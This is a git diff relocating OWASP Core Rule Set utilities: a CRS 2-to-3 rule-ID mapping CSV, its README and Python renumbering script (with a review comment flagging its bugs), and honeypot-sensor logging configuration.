rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test3.conf
diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test4.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test4.conf
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test4.conf
rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test4.conf
diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test5.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test5.conf
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test5.conf
rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test5.conf
diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test6.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test6.conf
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test6.conf
rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test6.conf
diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test7.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test7.conf
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test7.conf
rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test7.conf
diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test8.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test8.conf
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test8.conf
rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test8.conf
diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test9.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test9.conf
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test9.conf
rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test9.conf
diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/requirements.txt b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/requirements.txt
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/requirements.txt
rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/requirements.txt
diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/rules-check.py b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/rules-check.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/rules-check.py
rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/rules-check.py
diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/IdNumbering.csv b/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/IdNumbering.csv
new file mode 100644
index 000000000..269b88af8
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/IdNumbering.csv
@@ -0,0 +1,1132 @@ +200000,000000 +200121,000000 +200273,000000 +200280,000000 +200281,000000 +200287,000000 +200289,000000 +200290,000000 +200299,000000 +200316,000000 +200333,000000 +200337,000000 +200350,000000 +200351,000000 +200366,000000 +200367,000000 +200368,000000 +200369,000000 +200370,000000 +200371,000000 +200372,000000 +200373,000000 +200374,000000 +200375,000000 +200376,000000 +200377,000000 +200378,000000 +200379,000000 +200381,000000 +200382,000000 +200383,000000 +200384,000000 +200385,000000 +200386,000000 +200387,000000 +200388,000000 +200389,000000 +200390,000000 +200391,000000 +200392,000000 +200394,000000 +200395,000000 +200396,000000 +200397,000000 +200398,000000 +200399,000000 +200400,000000 +200401,000000 +200402,000000 +200403,000000 +200404,000000 +200405,000000 +200406,000000 +200407,000000 +200408,000000 +200409,000000 +200410,000000 +200411,000000 +200412,000000 +200413,000000 +200414,000000 +200415,000000 +200416,000000 +200417,000000 +200418,000000 +200419,000000 +200420,000000 +200421,000000 +200422,000000 +200423,000000 +200424,000000 +200425,000000 +200426,000000 +200427,000000 +200428,000000 +200429,000000 +200430,000000 +200431,000000 +200432,000000 +200433,000000 +200434,000000 +200435,000000 +200436,000000 +200437,000000 +200438,000000 +200439,000000 +200440,000000 +200441,000000 +200442,000000 +200443,000000 +200445,000000 +200446,000000 +200447,000000 +200448,000000 +200449,000000 +200450,000000 +200451,000000 +200452,000000 +200453,000000 +200454,000000 +200455,000000 +200456,000000 +200457,000000 +200458,000000 +200459,000000 +200460,000000 +200461,000000 +200462,000000 +200463,000000 +200464,000000 +200465,000000 +200466,000000 +200467,000000 +200468,000000 +200469,000000 +200470,000000 +200471,000000 +200472,000000 +200473,000000 +200474,000000 +200475,000000 +200476,000000 +200477,000000 +200478,000000 +200479,000000 +200480,000000 +200481,000000 +200482,000000 +200483,000000 +200484,000000 +200485,000000 +200486,000000 
+200487,000000 +200488,000000 +200489,000000 +200490,000000 +200491,000000 +200492,000000 +200493,000000 +200494,000000 +200495,000000 +200496,000000 +200497,000000 +200498,000000 +200499,000000 +200500,000000 +200501,000000 +200502,000000 +200503,000000 +200504,000000 +200505,000000 +200506,000000 +200507,000000 +200508,000000 +200509,000000 +200510,000000 +200511,000000 +200512,000000 +200513,000000 +200514,000000 +200515,000000 +200516,000000 +200517,000000 +200518,000000 +200519,000000 +200520,000000 +200521,000000 +200522,000000 +200523,000000 +200524,000000 +200525,000000 +200526,000000 +200527,000000 +200528,000000 +200529,000000 +200530,000000 +200532,000000 +200533,000000 +200534,000000 +200535,000000 +200536,000000 +200537,000000 +200538,000000 +200539,000000 +200540,000000 +200541,000000 +200542,000000 +200543,000000 +200544,000000 +200545,000000 +200546,000000 +200547,000000 +200548,000000 +200549,000000 +200550,000000 +200551,000000 +200552,000000 +200553,000000 +200554,000000 +200555,000000 +200556,000000 +200557,000000 +200558,000000 +200559,000000 +200560,000000 +200561,000000 +200562,000000 +200563,000000 +200564,000000 +200565,000000 +200566,000000 +200567,000000 +200568,000000 +200569,000000 +200570,000000 +200571,000000 +200572,000000 +200573,000000 +200574,000000 +200575,000000 +200576,000000 +200577,000000 +200578,000000 +200579,000000 +200580,000000 +200581,000000 +200582,000000 +200583,000000 +200584,000000 +200585,000000 +200586,000000 +200587,000000 +200588,000000 +200589,000000 +200590,000000 +200591,000000 +200592,000000 +200593,000000 +200594,000000 +200595,000000 +200596,000000 +200597,000000 +200598,000000 +200599,000000 +200600,000000 +200601,000000 +200602,000000 +200603,000000 +200604,000000 +200605,000000 +200606,000000 +200607,000000 +200608,000000 +200609,000000 +200610,000000 +200611,000000 +200612,000000 +200613,000000 +200614,000000 +200615,000000 +200616,000000 +200617,000000 +200618,000000 +200619,000000 +200620,000000 
+200621,000000 +200622,000000 +200623,000000 +200624,000000 +200625,000000 +200626,000000 +200627,000000 +200628,000000 +200629,000000 +200630,000000 +200631,000000 +200632,000000 +200633,000000 +200634,000000 +200635,000000 +200645,000000 +200646,000000 +200647,000000 +200648,000000 +200649,000000 +200650,000000 +200651,000000 +200652,000000 +200653,000000 +200654,000000 +200655,000000 +200656,000000 +200657,000000 +200658,000000 +200659,000000 +200660,000000 +200661,000000 +200662,000000 +200663,000000 +200664,000000 +200665,000000 +200666,000000 +200667,000000 +200668,000000 +200669,000000 +200670,000000 +200671,000000 +200673,000000 +200674,000000 +200675,000000 +200676,000000 +200677,000000 +200678,000000 +200679,000000 +200680,000000 +200681,000000 +200682,000000 +200683,000000 +200684,000000 +200685,000000 +200686,000000 +200687,000000 +200688,000000 +200689,000000 +200690,000000 +200692,000000 +200693,000000 +200694,000000 +200695,000000 +200696,000000 +200697,000000 +200698,000000 +200699,000000 +200700,000000 +200701,000000 +200702,000000 +200703,000000 +200704,000000 +200705,000000 +200706,000000 +200707,000000 +200708,000000 +200709,000000 +200710,000000 +200711,000000 +200712,000000 +200713,000000 +200714,000000 +200718,000000 +200719,000000 +200720,000000 +200721,000000 +200722,000000 +200723,000000 +200724,000000 +200725,000000 +200726,000000 +200727,000000 +200728,000000 +200729,000000 +200730,000000 +200731,000000 +200732,000000 +200733,000000 +200734,000000 +200735,000000 +200736,000000 +200737,000000 +200738,000000 +200739,000000 +200740,000000 +200741,000000 +200742,000000 +200743,000000 +200744,000000 +200745,000000 +200746,000000 +200747,000000 +200748,000000 +200749,000000 +200751,000000 +200752,000000 +200753,000000 +200754,000000 +200755,000000 +200756,000000 +200789,000000 +200865,000000 +200868,000000 +200872,000000 +200882,000000 +200883,000000 +200884,000000 +200885,000000 +200887,000000 +200888,000000 +200889,000000 +200890,000000 
+200892,000000 +200893,000000 +200896,000000 +200897,000000 +200899,000000 +200901,000000 +200905,000000 +200906,000000 +200907,000000 +200908,000000 +200910,000000 +200912,000000 +200914,000000 +200916,000000 +200917,000000 +200918,000000 +200919,000000 +200922,000000 +200923,000000 +200930,000000 +200931,000000 +200932,000000 +200933,000000 +200936,000000 +200937,000000 +200938,000000 +200939,000000 +200941,000000 +200942,000000 +200943,000000 +200945,000000 +200946,000000 +200950,000000 +200959,000000 +200964,000000 +200965,000000 +200966,000000 +200967,000000 +200969,000000 +200971,000000 +200972,000000 +200973,000000 +200974,000000 +200975,000000 +200976,000000 +200978,000000 +200979,000000 +200983,000000 +200984,000000 +200987,000000 +200988,000000 +200989,000000 +200990,000000 +200991,000000 +200992,000000 +200993,000000 +200994,000000 +200995,000000 +200996,000000 +200997,000000 +200999,000000 +201001,000000 +201002,000000 +201003,000000 +201004,000000 +201007,000000 +201008,000000 +201009,000000 +201012,000000 +201013,000000 +201014,000000 +201016,000000 +201017,000000 +201018,000000 +201019,000000 +201020,000000 +201022,000000 +201025,000000 +201026,000000 +201027,000000 +201034,000000 +201035,000000 +201036,000000 +201046,000000 +201047,000000 +201048,000000 +201055,000000 +201056,000000 +201061,000000 +201062,000000 +201063,000000 +201064,000000 +201065,000000 +201066,000000 +201070,000000 +201071,000000 +201072,000000 +201075,000000 +201077,000000 +201078,000000 +201080,000000 +201083,000000 +201084,000000 +201085,000000 +201086,000000 +201092,000000 +201094,000000 +201095,000000 +201097,000000 +201098,000000 +201099,000000 +201100,000000 +201101,000000 +201102,000000 +201104,000000 +201105,000000 +201106,000000 +201107,000000 +201108,000000 +201109,000000 +201110,000000 +201111,000000 +201113,000000 +201114,000000 +201115,000000 +201116,000000 +201117,000000 +201119,000000 +201120,000000 +201121,000000 +201125,000000 +201126,000000 +201127,000000 
+201137,000000 +201138,000000 +201142,000000 +201145,000000 +201155,000000 +201156,000000 +201157,000000 +201166,000000 +201167,000000 +201172,000000 +201173,000000 +201182,000000 +201183,000000 +201184,000000 +201185,000000 +201187,000000 +201188,000000 +201192,000000 +201193,000000 +201194,000000 +201195,000000 +201200,000000 +201201,000000 +201202,000000 +201203,000000 +201204,000000 +201206,000000 +201207,000000 +201209,000000 +201212,000000 +201213,000000 +201216,000000 +201218,000000 +201219,000000 +201221,000000 +201222,000000 +201233,000000 +201234,000000 +201235,000000 +201236,000000 +201237,000000 +201238,000000 +201239,000000 +201240,000000 +201241,000000 +201242,000000 +201243,000000 +201247,000000 +201248,000000 +201249,000000 +201256,000000 +201257,000000 +201258,000000 +201260,000000 +201265,000000 +201266,000000 +201267,000000 +201268,000000 +201269,000000 +201270,000000 +201271,000000 +201272,000000 +201274,000000 +201275,000000 +201279,000000 +201282,000000 +201283,000000 +201287,000000 +201288,000000 +201294,000000 +201295,000000 +201299,000000 +201308,000000 +201309,000000 +201310,000000 +201311,000000 +201312,000000 +201313,000000 +201315,000000 +201322,000000 +201323,000000 +201330,000000 +201331,000000 +201342,000000 +201343,000000 +201346,000000 +201347,000000 +900001,000000 +900002,000000 +900003,000000 +900004,000000 +900005,000000 +900006,000000 +900007,000000 +900008,000000 +900009,000000 +900010,000000 +900011,000000 +900012,000000 +900013,000000 +900014,000000 +900015,000000 +900016,000000 +900017,000000 +900018,000000 +900019,000000 +900020,000000 +900021,000000 +900030,000000 +900031,000000 +900032,000000 +900033,000000 +900034,000000 +900035,000000 +900036,000000 +900037,000000 +900038,000000 +900039,000000 +900040,000000 +900041,000000 +900042,000000 +900043,000000 +900044,000000 +900045,000000 +900046,000000 +900047,000000 +900048,000000 +900050,910100 +900051,910110 +900051,910120 +910006,000000 +910007,000000 +910008,000000 
+920005,000000 +920006,000000 +920007,000000 +920008,000000 +920009,000000 +920010,000000 +920011,000000 +920012,000000 +920013,000000 +920014,000000 +920015,000000 +920016,000000 +920017,000000 +920018,000000 +920019,000000 +920020,000000 +920021,000000 +920022,000000 +920023,000000 +950000,943120 +950001,942150 +950002,000000 +950003,943110 +950005,930120 +950006,000000 +950007,000000 +950008,000000 +950009,943100 +950010,000000 +950011,000000 +950012,921100 +950018,000000 +950019,000000 +950020,000000 +950103,930100 +950104,930110 +950107,920220 +950108,920240 +950109,920230 +950110,000000 +950115,000000 +950116,920260 +950117,931100 +950118,931110 +950119,931120 +950120,931130 +950801,920250 +950901,942130 +950907,932100 +950908,000000 +950910,921120 +950911,921130 +950912,921140 +950913,921150 +950914,921160 +950915,921110 +950921,000000 +950922,000000 +950923,000000 +958000,000000 +958001,000000 +958002,000000 +958003,000000 +958004,000000 +958005,000000 +958006,000000 +958007,000000 +958008,000000 +958009,000000 +958010,000000 +958011,000000 +958012,000000 +958013,000000 +958016,000000 +958017,000000 +958018,000000 +958019,000000 +958020,000000 +958022,000000 +958023,000000 +958024,000000 +958025,000000 +958026,000000 +958027,000000 +958028,000000 +958030,000000 +958031,000000 +958032,000000 +958033,000000 +958034,000000 +958036,000000 +958037,000000 +958038,000000 +958039,000000 +958040,000000 +958041,000000 +958045,000000 +958046,000000 +958047,000000 +958049,000000 +958051,000000 +958052,000000 +958054,000000 +958056,000000 +958057,000000 +958059,000000 +958230,920190 +958231,920200 +958291,000000 +958295,920210 +958297,000000 +958404,000000 +958405,000000 +958406,000000 +958407,000000 +958408,000000 +958409,000000 +958410,000000 +958411,000000 +958412,000000 +958413,000000 +958414,000000 +958415,000000 +958416,000000 +958417,000000 +958418,000000 +958419,000000 +958420,000000 +958421,000000 +958422,000000 +958423,000000 +958976,000000 +958977,933110 
+958978,933000 +958979,933120 +958980,933130 +959070,942380 +959071,942390 +959072,942400 +959073,942410 +959151,933100 +960000,920120 +960001,000000 +960002,000000 +960003,000000 +960006,920330 +960007,920290 +960008,920280 +960009,920320 +960010,920420 +960011,920170 +960012,920180 +960014,000000 +960015,920300 +960016,920160 +960017,920350 +960018,000000 +960020,000000 +960021,920310 +960022,000000 +960024,942460 +960032,911100 +960034,920430 +960035,920440 +960038,920450 +960208,920370 +960209,920360 +960335,920380 +960341,920390 +960342,920400 +960343,920410 +960901,920270 +960902,000000 +960904,920340 +960911,920100 +960912,920130 +960913,000000 +960914,920140 +960915,920150 +970003,951100 +970004,954120 +970007,000000 +970008,000000 +970009,953100 +970010,000000 +970011,000000 +970012,000000 +970013,950130 +970014,952100 +970015,953110 +970016,000000 +970017,952110 +970017,954100 +970018,000000 +970021,000000 +970118,954110 +970901,950100 +970902,953120 +970903,000000 +970904,954130 +973300,941320 +973301,000000 +973302,000000 +973303,000000 +973304,000000 +973305,000000 +973306,000000 +973307,000000 +973308,000000 +973309,000000 +973310,000000 +973311,000000 +973312,000000 +973313,000000 +973314,000000 +973315,941190 +973316,000000 +973317,941300 +973318,941290 +973319,941310 +973320,941280 +973321,941270 +973322,941250 +973323,941240 +973324,941230 +973325,000000 +973326,941200 +973327,000000 +973328,000000 +973329,000000 +973330,000000 +973331,000000 +973332,941330 +973333,941340 +973334,000000 +973335,000000 +973336,941110 +973337,941120 +973338,941140 +973339,941130 +973340,941160 +973341,941170 +973342,941180 +973343,941100 +973344,941100 +973345,941220 +973346,941210 +973347,000000 +973348,941260 +973350,941150 +981000,000000 +981001,000000 +981003,000000 +981004,000000 +981005,000000 +981006,000000 +981007,000000 +981018,000000 +981020,901100 +981021,901110 +981022,000000 +981033,000000 +981034,000000 +981035,000000 +981036,000000 +981037,000000 
+981038,000000 +981039,000000 +981040,000000 +981041,000000 +981042,000000 +981043,000000 +981044,912120 +981045,912130 +981046,912140 +981047,912150 +981048,912160 +981049,912170 +981050,000000 +981051,000000 +981052,000000 +981053,000000 +981054,000000 +981055,000000 +981056,000000 +981057,000000 +981058,000000 +981059,000000 +981060,000000 +981061,000000 +981062,000000 +981063,000000 +981064,000000 +981075,000000 +981076,000000 +981077,000000 +981078,000000 +981079,000000 +981080,000000 +981081,000000 +981082,000000 +981083,000000 +981084,000000 +981085,000000 +981086,000000 +981087,000000 +981088,000000 +981089,000000 +981090,000000 +981091,000000 +981092,000000 +981093,000000 +981094,000000 +981095,000000 +981096,000000 +981097,000000 +981098,000000 +981099,000000 +981100,000000 +981101,000000 +981102,000000 +981103,000000 +981104,000000 +981105,000000 +981110,000000 +981131,000000 +981132,000000 +981133,000000 +981134,000000 +981136,000000 +981137,000000 +981138,910140 +981139,910190 +981140,910000 +981141,910150 +981142,910160 +981143,910170 +981144,910180 +981145,000000 +981172,942420 +981173,942430 +981175,949100 +981176,949190 +981177,000000 +981178,000000 +981179,949110 +981180,949120 +981181,949130 +981182,949140 +981183,949150 +981184,949160 +981185,000000 +981186,949170 +981187,949180 +981188,000000 +981189,000000 +981190,000000 +981191,000000 +981192,000000 +981193,000000 +981194,000000 +981195,000000 +981196,000000 +981197,000000 +981198,000000 +981199,000000 +981200,959100 +981201,980100 +981202,980110 +981203,980120 +981204,980130 +981205,980140 +981219,000000 +981220,000000 +981221,000000 +981222,000000 +981223,000000 +981224,000000 +981227,920110 +981228,000000 +981229,000000 +981230,000000 +981231,942440 +981235,000000 +981236,000000 +981237,000000 +981238,000000 +981239,000000 +981240,942300 +981241,942230 +981242,942330 +981243,942370 +981244,942180 +981245,942260 +981246,942340 +981247,942360 +981248,942210 +981249,942310 +981250,942170 
+981251,942350 +981252,942240 +981253,942320 +981254,942280 +981255,942190 +981256,942250 +981257,942200 +981260,942450 +981261,942100 +981270,942290 +981272,942160 +981276,942270 +981277,942220 +981300,000000 +981301,000000 +981302,000000 +981303,000000 +981304,000000 +981305,000000 +981306,000000 +981307,000000 +981308,000000 +981309,000000 +981310,000000 +981311,000000 +981312,000000 +981313,000000 +981314,000000 +981315,000000 +981316,000000 +981317,000000 +981318,942110 +981319,942120 +981320,942140 +981400,000000 +981401,000000 +981402,000000 +981403,000000 +981404,000000 +981405,000000 +981406,000000 +981407,000000 +990002,913100 +990012,000000 +990901,913110 +990902,913120 +999003,000000 +999004,000000 +999005,000000 +999006,000000 +999008,000000 +999010,000000 +999011,000000 +9700010,951110 +9700011,951120 +9700012,951130 +9700013,951140 +9700014,951150 +9700015,951160 +9700016,951170 +9700017,951180 +9700018,951190 +9700019,951200 +9700020,951210 +9700021,951220 +9700022,951230 +9700023,951240 +9700024,951250 +9700025,951260 diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/README b/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/README new file mode 100644 index 000000000..fd1861dd2 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/README 
@@ -0,0 +1,30 @@
+CRS 2.x to 3.x migration utility
+================================
+
+In CRS 3.0, we have renumbered the rules to be more logical and helpful.
+The new rule file names now correspond with the rule IDs in the file.
+First rule of a given file is usually 9XX100, then the rules continue
+in steps of ten. Related rules/siblings follow with a single digit
+change (9XX101, etc.).
+
+This utility replaces CRS 2 ruleIds with their CRS 3 counterparts.
+You can use it when migrating your CRS 2 exclusion/.conf files to CRS 3.0
+or higher.
+
+Example usage:
+
+ ./update.py -f your_old_modsec_conf.conf
+
+Rules which have been removed in CRS 3 are listed with the new ID 000000 in the
+CSV file. This means that the former rule is no longer part of CRS 3. If after
+replacement you find a string 000000 in your config files, you can likely
+remove that exclusion or special case.
+
+If you want to create your own tooling for this migration, you can use
+the file idNumbering.csv in this directory. It lists the old rule IDs of
+CRS 2.2, together with the corresponding rule IDs in CRS 3.0.
+
+A rule renumbering is painful for all existing installations. But we really
+think that the rule IDs lacked sense and reason, and we are confident future
+maintenance will be much easier once this is done. We do not plan to change
+rule IDs after this. We appreciate your understanding in this matter.
diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/update.py b/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/update.py
new file mode 100755
index 000000000..42ea75b96
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/update.py
@@ -0,0 +1,55 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""This is designed to convert 2.x CRS ID numbering to 3.x CRS numbering"""
+from __future__ import print_function
+import csv
+import argparse
+import os
+import sys
+
+def main():
+ """Main function that contains all the logic to relabel CRS IDs"""
+
+ id_translation_file = os.path.join(sys.path[0], "IdNumbering.csv")
+
+ if not os.path.isfile(id_translation_file):
+ sys.stderr.write("We were unable to locate the ID translation CSV (idNumbering.csv) \
+ please place this is the same directory as this script\n")
+ sys.exit(1)
+
+ parser = argparse.ArgumentParser(description="A program that takes in an exceptions file \
+ and renumbers all the ID to match OWASP CRS 3 numbers. Output will be directed to STDOUT.")
+ parser.add_argument("-f", "--file", required=True, action="store", dest="fname", \
+ help="the file to be renumbered")
+ args = parser.parse_args()
+
+ if not os.path.isfile((args.fname).encode('utf8')):
+ sys.stderr.write("We were unable to find the file you were trying to update the ID numbers \
+ in, please check your path\n")
+ sys.exit(1)
+
+ fcontent = ""
+
+ try:
+ update_file = open((args.fname).encode('utf-8'), "r")
+ try:
+ fcontent = update_file.read()
+ finally:
+ update_file.close()
+ except IOError:
+ sys.stderr.write("There was an error opening the file you were trying to update")
+
+ if fcontent != "":
+ # CSV File
+ id_csv_file = open(id_translation_file, 'rt')
+ try:
+ reader = csv.reader(id_csv_file)
+ for row in reader:
+ fcontent = fcontent.replace(row[0], row[1])
+ finally:
+ id_csv_file.close()
+ print(fcontent)
+
+if __name__ == "__main__":
+ main()
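Review bot: The renumbering loop `fcontent = fcontent.replace(row[0], row[1])` does a plain substring replacement over the whole file, so an old ID that is a substring of a longer number (the CSV in this commit mixes six- and seven-digit IDs) is rewritten in place, and an exclusion can end up pointing at a different rule than the operator intended. Matching whole numeric tokens avoids that: `fcontent = re.sub(r'\b' + re.escape(row[0]) + r'\b', row[1], fcontent)`, with `import re` added next to the other imports. Separately, the script opens `IdNumbering.csv` while its own error message and the README name `idNumbering.csv`; on a case-sensitive filesystem only one spelling resolves, and the CSV's file header is outside this view, so the actual name needs checking. The `except IOError` branch also writes its message and then falls through to a zero exit status, where `sys.exit(1)` would match the two earlier failure paths.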
diff --git a/src/common/core/modsecurity/files/coreruleset/util/find-max-datalen-in-tests/README.md b/src/common/core/modsecurity/files/coreruleset-v4/util/find-max-datalen-in-tests/README.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/find-max-datalen-in-tests/README.md
rename to src/common/core/modsecurity/files/coreruleset-v4/util/find-max-datalen-in-tests/README.md
diff --git a/src/common/core/modsecurity/files/coreruleset/util/find-max-datalen-in-tests/find_max_datalen.py b/src/common/core/modsecurity/files/coreruleset-v4/util/find-max-datalen-in-tests/find_max_datalen.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/find-max-datalen-in-tests/find_max_datalen.py
rename to src/common/core/modsecurity/files/coreruleset-v4/util/find-max-datalen-in-tests/find_max_datalen.py
diff --git a/src/common/core/modsecurity/files/coreruleset/util/find-rules-without-test/README.md b/src/common/core/modsecurity/files/coreruleset-v4/util/find-rules-without-test/README.md
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/find-rules-without-test/README.md
rename to src/common/core/modsecurity/files/coreruleset-v4/util/find-rules-without-test/README.md
diff --git a/src/common/core/modsecurity/files/coreruleset/util/find-rules-without-test/find-rules-without-test.py b/src/common/core/modsecurity/files/coreruleset-v4/util/find-rules-without-test/find-rules-without-test.py
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/find-rules-without-test/find-rules-without-test.py
rename to src/common/core/modsecurity/files/coreruleset-v4/util/find-rules-without-test/find-rules-without-test.py
diff --git a/src/common/core/modsecurity/files/coreruleset/util/find-rules-without-test/requirements.txt b/src/common/core/modsecurity/files/coreruleset-v4/util/find-rules-without-test/requirements.txt
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/find-rules-without-test/requirements.txt
rename to src/common/core/modsecurity/files/coreruleset-v4/util/find-rules-without-test/requirements.txt
diff --git a/src/common/core/modsecurity/files/coreruleset/util/fp-finder/english-extended.txt b/src/common/core/modsecurity/files/coreruleset-v4/util/fp-finder/english-extended.txt
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/fp-finder/english-extended.txt
rename to src/common/core/modsecurity/files/coreruleset-v4/util/fp-finder/english-extended.txt
diff --git a/src/common/core/modsecurity/files/coreruleset/util/fp-finder/spell.sh b/src/common/core/modsecurity/files/coreruleset-v4/util/fp-finder/spell.sh
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/util/fp-finder/spell.sh
rename to src/common/core/modsecurity/files/coreruleset-v4/util/fp-finder/spell.sh
diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/geo-location/README b/src/common/core/modsecurity/files/coreruleset-v4/util/geo-location/README
new file mode 100644
index 000000000..b9018fb90
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v4/util/geo-location/README
@@ -0,0 +1,5 @@
+License
+The GeoLite databases are distributed under the Creative Commons Attribution-ShareAlike 3.0 Unported License. The attribution requirement may be met by including the following in all advertising and documentation mentioning features of or use of this database:
+
+This product includes GeoLite data created by MaxMind, available from
+ http://www.maxmind.com.
diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/README.md b/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/README.md
new file mode 100644
index 000000000..66fc6af9b
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/README.md
@@ -0,0 +1,14 @@
+The purpose of these files is to turn your current ModSecurity host into
+a pseudo-honeypot sensor by doing the following:
+
+1. Instructs Apache to listen for traffic on multiple unused ports
+ - 8000
+ - 8080
+ - 8888
+2. Creates Apache virtual host containers to bind to these ports.
+3. If any traffic is received on these ports, then ModSecurity will
+ inspect the traffic by inheriting any rules specified in the main
+ Apache configuration.
+4. ModSecurity's Audit Engine will use the mlogc program to forward
+ the audit log entry onto the ModSecurity Project's central logging
+ server.
diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/mlogc-honeypot-sensor.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/mlogc-honeypot-sensor.conf
new file mode 100644
index 000000000..b4afad140
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/mlogc-honeypot-sensor.conf
@@ -0,0 +1,97 @@ +########################################################################## +# Required configuration +# At a minimum, the items in this section will need to be adjusted to +# fit your environment. The remaining options are optional. +########################################################################## + +# Points to the root of the installation. All relative +# paths will be resolved with the help of this path. +CollectorRoot "/var/log/mlogc" + +# ModSecurity Console receiving URI. You can change the host +# and the port parts but leave everything else as is. +ConsoleURI "http://204.13.200.239/rpc/auditLogReceiver" + +# Sensor credentials +SensorUsername "honeypot-sensor" +SensorPassword "test1234" + +# Base directory where the audit logs are stored. This can be specified +# as a path relative to the CollectorRoot, or a full path. +LogStorageDir "data" + +# Transaction log will contain the information on all log collector +# activities that happen between checkpoints. The transaction log +# is used to recover data in case of a crash (or if Apache kills +# the process). +TransactionLog "mlogc-transaction.log" + +# The file where the pending audit log entry data is kept. This file +# is updated on every checkpoint. +QueuePath "mlogc-queue.log" + +# The location of the error log. +ErrorLog "mlogc-error.log" + +# The location of the lock file. +LockFile "mlogc.lck" + +# Keep audit log entries after sending? (0=false 1=true) +# NOTE: This is required to be set in SecAuditLog mlogc config if you +# are going to use a secondary console via SecAuditLog2. +KeepEntries 0 + + +########################################################################## +# Optional configuration +########################################################################## + +# The error log level controls how much detail there +# will be in the error log. 
The levels are as follows: +# 0 - NONE +# 1 - ERROR +# 2 - WARNING +# 3 - NOTICE +# 4 - DEBUG +# 5 - DEBUG2 +# +ErrorLogLevel 3 + +# How many concurrent connections to the server +# are we allowed to open at the same time? Log collector uses +# multiple connections in order to speed up audit log transfer. +# This is especially needed when the communication takes place +# over a slow link (e.g. not over a LAN). +MaxConnections 10 + +# How many requests a worker will process before recycling itself. +# This is to help prevent problems due to any memory leaks that may +# exists. If this is set to 0, then no maximum is imposed. The default +# is 1000 requests per worker (the number of workers is controlled by the +# MaxConnections limit). +MaxWorkerRequests 1000 + +# The time each connection will sit idle before being reused, +# in milliseconds. Increase if you don't want ModSecurity Console +# to be hit with too many log collector requests. +TransactionDelay 50 + +# The time to wait before initialization on startup in milliseconds. +# Increase if mlogc is starting faster then termination when the +# sensor is reloaded. +StartupDelay 5000 + +# How often is the pending audit log entry data going to be written +# to a file. The default is 15 seconds. +CheckpointInterval 15 + +# If the server fails all threads will back down until the +# problem is sorted. The management thread will periodically +# launch a thread to test the server. The default is to test +# once in 60 seconds. +ServerErrorTimeout 60 + +# The following two parameters are not used yet, but +# reserved for future expansion. +# KeepAlive 150 +# KeepAliveTimeout 300 diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf 